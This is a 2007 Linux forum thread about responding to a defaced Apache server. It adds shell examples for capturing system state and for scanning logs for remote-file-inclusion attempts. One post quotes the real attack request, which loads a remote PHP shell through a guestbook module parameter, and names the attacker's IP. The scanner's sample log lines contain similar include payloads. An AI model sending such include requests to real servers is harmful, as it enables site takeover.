Linux - Security
03-09-2007, 08:37 AM  #1  Member (Registered: Sep 2003, Posts: 72)
My server has been hacked....defaced
Hello,
Yesterday my server was hacked and all my websites were defaced.
I thought I had a well protected system, however it seems that the attack was done via Apache.
I was just working on the server a few minutes ago and I saw the CPU load increase.
As I did not start any unusual application... I was a bit puzzled:
I noticed: owner apache, command: find . -f chmod 777.
I think apache is not able to start such a process automatically...
Is it a normal apache behaviour? Or is it indeed a new attack?
Thanks for your answers
macadam
03-09-2007, 08:55 AM  #2  LQ Guru (Registered: May 2005, Location: Atlanta Georgia USA, Distribution: Redhat (RHEL), CentOS, Fedora, CoreOS, Debian, FreeBSD, HP-UX, Solaris, SCO, Posts: 7,831)
Sounds like an attack.
chmoding all files to be read, write, execute for everyone (777) is never a good idea.
Make sure you're running only the initial httpd process as root - all the rest of the apache processes should be running as a different user (modify httpd.conf for that).
Also use lsof to see who is connected - you can use iptables to block suspected offending addresses.
03-09-2007, 09:02 AM  #3  Moderator (Registered: May 2001, Posts: 29,415)
> Yesterday my server was hacked and all my websites were defaced.
Letting it linger that long isn't a good start...
Is the box in colo or local?
> I thought I had a well protected system, however it seems that the attack was done via Apache. I was just working on the server a few minutes ago and I saw the CPU load increase. As I did not start any unusual application... I was a bit puzzled: I noticed: owner apache, command: find . -f chmod 777. I think apache is not able to start such a process automatically... Is it a normal apache behaviour? Or is it indeed a new attack?
Most likely a flaw in an (outdated version of an?) app Apache runs, think PHP-based fora or Wordpress or Awstats.
While I'll be taking shortcuts here, do the following to mitigate the situation, I'll post more verbose instructions soon after (do use common sense when executing):
- save snapshots of 1) processes, 2) network connections, 3) open files and 4) users off-site,
- reconfigure the firewall so only your IP (range) has access to anything on the box and restart the firewall,
- kill publicly accessible services (except SSH to get in) and keep them from starting up,
- if possible: reboot.
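As an added example of the first step in the list above (it is not code from the thread or from LQ), a POSIX shell function that collects the four volatile snapshots into one timestamped directory that you then copy off the box. The output directory name, the column choices and the fallbacks for missing tools are my assumptions.

```shell
# Added example, not from the thread: collect the snapshots post #3 asks for
# (processes, network connections, open files, users) into one directory.
# Copy that directory off-site afterwards (e.g. scp to a machine the attacker
# cannot reach); nothing here is read back on the compromised host.
# Tool names are the standard ones; a missing tool is skipped, not fatal.

snapshot_state() {
    outdir="${1:-./ir-snapshot-$(date +%Y%m%d-%H%M%S)}"
    mkdir -p "$outdir" || return 1

    # 1) processes: owner, state and full command line (this is how the
    #    OP spotted "find . -f chmod 777" running as the apache user);
    #    ls /proc is a last resort when no ps binary is present
    { ps -eo pid,ppid,user,stat,args || ps aux || ls /proc; } \
        > "$outdir/processes.txt" 2>/dev/null

    # 2) network connections and listeners, with the owning PID
    if command -v ss >/dev/null 2>&1; then
        ss -tunap > "$outdir/connections.txt" 2>&1 || true
    elif command -v netstat >/dev/null 2>&1; then
        netstat -tunap > "$outdir/connections.txt" 2>&1 || true
    fi

    # 3) open files (lsof, as post #2 suggests; absent on minimal images)
    if command -v lsof >/dev/null 2>&1; then
        lsof -n -P > "$outdir/open-files.txt" 2>&1 || true
    fi

    # 4) users: logged in right now, plus recent logins
    who > "$outdir/who.txt" 2>&1 || true
    if command -v last >/dev/null 2>&1; then
        last -n 50 > "$outdir/last.txt" 2>&1 || true
    fi

    # checksums let you prove the off-site copy matches what was collected
    if command -v sha256sum >/dev/null 2>&1; then
        (cd "$outdir" && sha256sum ./*.txt > SHA256SUMS) || true
    fi
    echo "$outdir"
}
```

Run it before changing anything else on the box (`dir=$(snapshot_state)`), then copy `$dir` off-site; the firewall and service changes in the list come after, so the snapshot still shows the attacker's connections.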
03-09-2007, 09:02 AM  #4  Member, Original Poster (Registered: Sep 2003, Posts: 72)
Wow that's a quick reply.
Initial Httpd is running as root and the other processes as 'apache' so...at least this is good.
Stupid question, but is httpd as user 'allowed' to chmod? Is there a risk?
03-09-2007, 09:09 AM  #5  Member, Original Poster (Registered: Sep 2003, Posts: 72)
Hi UnSpawn
I restored everything a few minutes after the attack... I am not crazy ;-)
Thank god, I have a good backup philosophy!
The box is a dedicated server hosted in a center.
I tried to get the IP of the attack but no luck...missed it.
03-09-2007, 09:11 AM  #6  Moderator (Registered: May 2001, Posts: 29,415)
> Initial Httpd is running as root and the other processes as 'apache' so...at least this is good.
Yes, Apache starts as root and drops rights to the unprivileged "apache" user. Those are the children and they handle the requests. Mind you: "good" is IMNSHO not a valid criterion to base a decision on: you have to *verify* everything, but we'll work on that.
> Stupid question, but is httpd as user 'allowed' to chmod?
Apache itself has no concept of applying or changing DAC rights. My first guess would be an uploaded PHP shell or remote includes.
> Is there a risk?
Yes. Mitigate the situation and do it NOW.
Last edited by unSpawn; 03-09-2007 at 09:14 AM.
03-09-2007, 09:16 AM  #7  Member, Original Poster (Registered: Sep 2003, Posts: 72)
Thanks for your reply... I am monitoring and checking everything for hours... trying to spot the problem!!!
03-09-2007, 09:23 AM  #8  Moderator (Registered: May 2001, Posts: 29,415)
> I am monitoring and checking everything for hours... trying to spot the problem!
I need to get one thing straight here. Could you tell me if you intend to mitigate the situation as outlined above or if you intend to continue your "monitoring and checking" approach?
03-09-2007, 09:28 AM  #9  Member, Original Poster (Registered: Sep 2003, Posts: 72)
I do my best...sorry
03-09-2007, 09:35 AM  #10  Moderator (Registered: May 2001, Posts: 29,415)
Definitely no need to *apologise*. It's just that I would like to know what kind of support you will be needing. After all, we won't be doing this, you are.
03-09-2007, 09:56 AM  #11  Member, Original Poster (Registered: Sep 2003, Posts: 72)
Well, I am not an expert... just a common Linux user, let's say, and I thank you for the time you allocate to my problem.
I just want to prevent the hacking of yesterday from happening again (he replaced all index.php or index.htm* with his own file...)
So I just want to spot the vulnerability and 'solve' this issue...
03-09-2007, 10:43 AM  #12  Member, Original Poster (Registered: Sep 2003, Posts: 72)
OK, hacked again... got his IP 88.230.29.147 and found how he got in...
POST /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.turkbanner.net/lang/r57.jpg? HTTP/1.1
I am deleting this module...
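The request line in the post above is a remote file inclusion: the module takes a path from the `tpl_pgb_moddir` parameter and PHP fetches and runs the remote URL it is given. As an added example (not the original poster's log or any LQ tool), a shell function that pulls requests of that shape out of an Apache combined access log; the sample lines are constructed with reserved documentation addresses and a placeholder host, not the real attacker's.

```shell
# Added example, not from the thread: flag access-log requests whose query
# string passes a remote URL into a script parameter, the pattern behind
# the guestbook module compromise in post #12.

rfi_scan() {
    # one Apache combined-format log file as $1; prints "client path?query"
    # for each request with a parameter set to an http(s)/ftp URL
    grep -E '"(GET|POST) [^" ]*\?[^" ]*=(https?|ftp)://' "$1" \
      | awk '{ print $1, $7 }'
}

# Constructed sample log (documentation IPs, placeholder host); the first
# line mirrors the shape of the request the OP found, with a legitimate
# request in between.
SAMPLE_LOG="${TMPDIR:-/tmp}/rfi-sample-$$.log"
cat > "$SAMPLE_LOG" <<'EOF'
203.0.113.5 - - [09/Mar/2007:10:41:02 -0500] "POST /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://attacker.example/r57.jpg? HTTP/1.1" 200 512 "-" "Mozilla/4.0"
198.51.100.7 - - [09/Mar/2007:10:41:09 -0500] "GET /index.php?page=about HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
203.0.113.5 - - [09/Mar/2007:10:42:30 -0500] "GET /index.php?redir=https://attacker.example/ HTTP/1.1" 302 0 "-" "Mozilla/4.0"
EOF
```

Run `rfi_scan /var/log/httpd/access_log` to list the offending clients and scripts; on the PHP side, `allow_url_include = Off` in php.ini (and `allow_url_fopen = Off` where no script needs remote reads) stops include() from fetching a URL at all, so the grep then becomes a check that nobody is still probing for it.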
03-09-2007, 11:00 AM  #13  Moderator (Registered: May 2001, Posts: 29,415)
> (..) I just want to prevent the hacking of yesterday from happening again
> (...) I just want to spot the vulnerability and 'solve' this issue...
To be able to help us help you in a meaningful way I had to ask some questions. You answered about one, I think. That leaves me with about zilch info to work with. Sure, it would be easy to spill generic steps to take like reconfigure the box, update your software and harden it. That is however not even half the story, but if you "just want to solve this" your way and get on with it, then so be it.
Let's make it clear I do not support that approach.
The best approach IMHO would be to first make sure the box is under your control. (Re)gaining control, keeping further damage from occurring, restricting access and making sure the box *stays* under your control is mandatory. Any further action is a waste of time and effort without that. The next step would be to verify the whole system in all aspects to assess to what extent the perp had access to the system. That step is mandatory because the conclusions you draw dictate what steps to take next. If you cannot ascertain the system was untouched and access was confined to only unprivileged user access, then the only way to regain trust is a full system rebuild (as in repartition, reformat, reinstall from scratch). Sure, you could sidestep this by restoring from a backup, but that would only work if 1) the backup covers the system completely, 2) the integrity of the backup can be verified without doubt and 3) the system will be brought up in a controlled way and access is restricted until the system is reconfigured, updated and hardened.
Since you haven't mitigated the situation, as your latest post clearly shows, you're back at post #3.
03-10-2007, 12:05 PM  #14  Member, Original Poster (Registered: Sep 2003, Posts: 72)
Hi,
I surely did not want to upset you...
I followed your suggestions, but in my opinion there is no use restoring backups and the system if the way the hacker got in is not defined... the same situation will occur again after restoration.
So first, I found how he came through. At that moment, logs copied, server isolated and solutions applied.
After that procedure and hours of checks to trust all params again, the server is back online.
Thanks for your help, and it is always good to be a bit shaken by experts ;-)
Regards
macadam
03-10-2007, 06:45 PM  #15  Moderator (Registered: May 2001, Posts: 29,415)
> I followed your suggestions, but in my opinion there is no use restoring backups and the system if the way the hacker got in is not defined... the same situation will occur again after restoration.
You didn't read what I wrote too well.
> So first, I found how he came through. At that moment, logs copied,
Wasn't hard to locate the exploit. BTW, sharing detailed who-what-how info definitely is the best way to thank LQ for its efforts, and sharing your experiences may win you the gratitude of those users that may find themselves in the same position.
> server isolated and solutions applied. After that procedure and hours of checks to trust all params again, the server is back online.
Details on what "solutions applied" and what "checks to trust all params again" contain would be welcome.